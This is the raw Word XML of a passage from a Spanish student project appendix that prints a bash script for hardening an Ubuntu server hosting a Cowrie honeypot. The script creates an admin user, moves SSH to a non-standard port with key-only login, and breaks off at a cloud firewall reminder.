          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo F. Script de Bastionado (01_hardening.sh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="120" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/env bash</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01_hardening.sh - Bastionado del servidor (PFC-Cowrie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Proyecto Intermodular ASIR - Diego Perez Fonterosa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  - Actualiza el sistema y activa las actualizaciones automaticas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  - Mueve el SSH real al puerto 2022, solo con clave y sin root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  - Firewall con iptables (persistente): denegar todo salvo lo necesario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  - Crea swap si la maquina tiene menos de 2 GB de RAM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Uso:  sudo bash 01_hardening.sh   (o como root: bash 01_hardening.sh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Probado para Ubuntu Server 24.04 LTS. Valido para proveedores que</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  entregan un usuario "ubuntu" (Oracle, AWS) o solo root (Hetzner).</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set -euo pipefail</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SSH_PORT=2022</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">SCRIPT_DIR="$(cd "$(dirname "$0")" &amp;&amp; pwd)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">DROPIN=/etc/ssh/sshd_config.d/00-pfc-hardening.conf</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info() { echo -e "\n\033[1;34m[+]\033[0m $*"; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">warn() { echo -e "\033[1;33m[!]\033[0m $*"; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">die()  { echo -e "\033[1;31m[x]\033[0m $*" &gt;&amp;2; exit 1; }</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 Comprobaciones previas -------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[[ $EUID -eq 0 ]] || die "Ejecuta el script con sudo (o como root)."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[[ -f "$SCRIPT_DIR/sshd_hardening.conf" ]] || die "Falta sshd_hardening.conf junto al script."</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 Usuario administrador ---------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Este script prohibe el acceso SSH como root, asi que antes debe existir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># un usuario administrador con tu clave. Si la maquina solo trae root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># (Hetzner), se crea uno copiando la clave autorizada de root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if [[ -n "${SUDO_USER:-}" &amp;&amp; "${SUDO_USER}" != "root" ]]; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  ADMIN_USER="$SUDO_USER"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">elif id ubuntu &amp;&gt;/dev/null &amp;&amp; [[ -s /home/ubuntu/.ssh/authorized_keys ]]; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  ADMIN_USER=ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">else</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  [[ -s /root/.ssh/authorized_keys ]] || die "root no tiene claves en /root/.ssh/authorized_keys."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  read -rp "  Nombre del usuario administrador a crear [diego]: " ADMIN_USER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  ADMIN_USER="${ADMIN_USER:-diego}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  [[ "$ADMIN_USER" =~ ^[a-z_][a-z0-9_-]*$ ]] || die "Nombre de usuario no valido."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  if ! id "$ADMIN_USER" &amp;&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    info "Creando el usuario administrador $ADMIN_USER..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    adduser --disabled-password --gecos "" "$ADMIN_USER"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  usermod -aG sudo "$ADMIN_USER"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  install -d -m 700 -o "$ADMIN_USER" -g "$ADMIN_USER" "/home/$ADMIN_USER/.ssh"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  install -m 600 -o "$ADMIN_USER" -g "$ADMIN_USER" /root/.ssh/authorized_keys \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "/home/$ADMIN_USER/.ssh/authorized_keys"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Solo se pide contrasena si el usuario aun no tiene una (estado "P"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  # para poder volver a ejecutar el script sin repetir este paso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  if [[ "$(passwd -S "$ADMIN_USER" | awk '{print $2}')" != "P" ]]; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    echo "  Elige la contrasena de $ADMIN_USER. Solo la pedira sudo: el SSH seguira siendo solo con clave."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    passwd "$ADMIN_USER"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[[ -s "/home/$ADMIN_USER/.ssh/authorized_keys" ]] \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  || die "El usuario $ADMIN_USER no tiene claves en ~/.ssh/authorized_keys: te quedarias fuera."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">info "Usuario administrador: $ADMIN_USER"</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cat &lt;&lt;EOF</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ANTES DE CONTINUAR, en el firewall de tu proveedor cloud abre la</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  entrada TCP $SSH_PORT desde cualquier origen (0.0.0.0/0):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
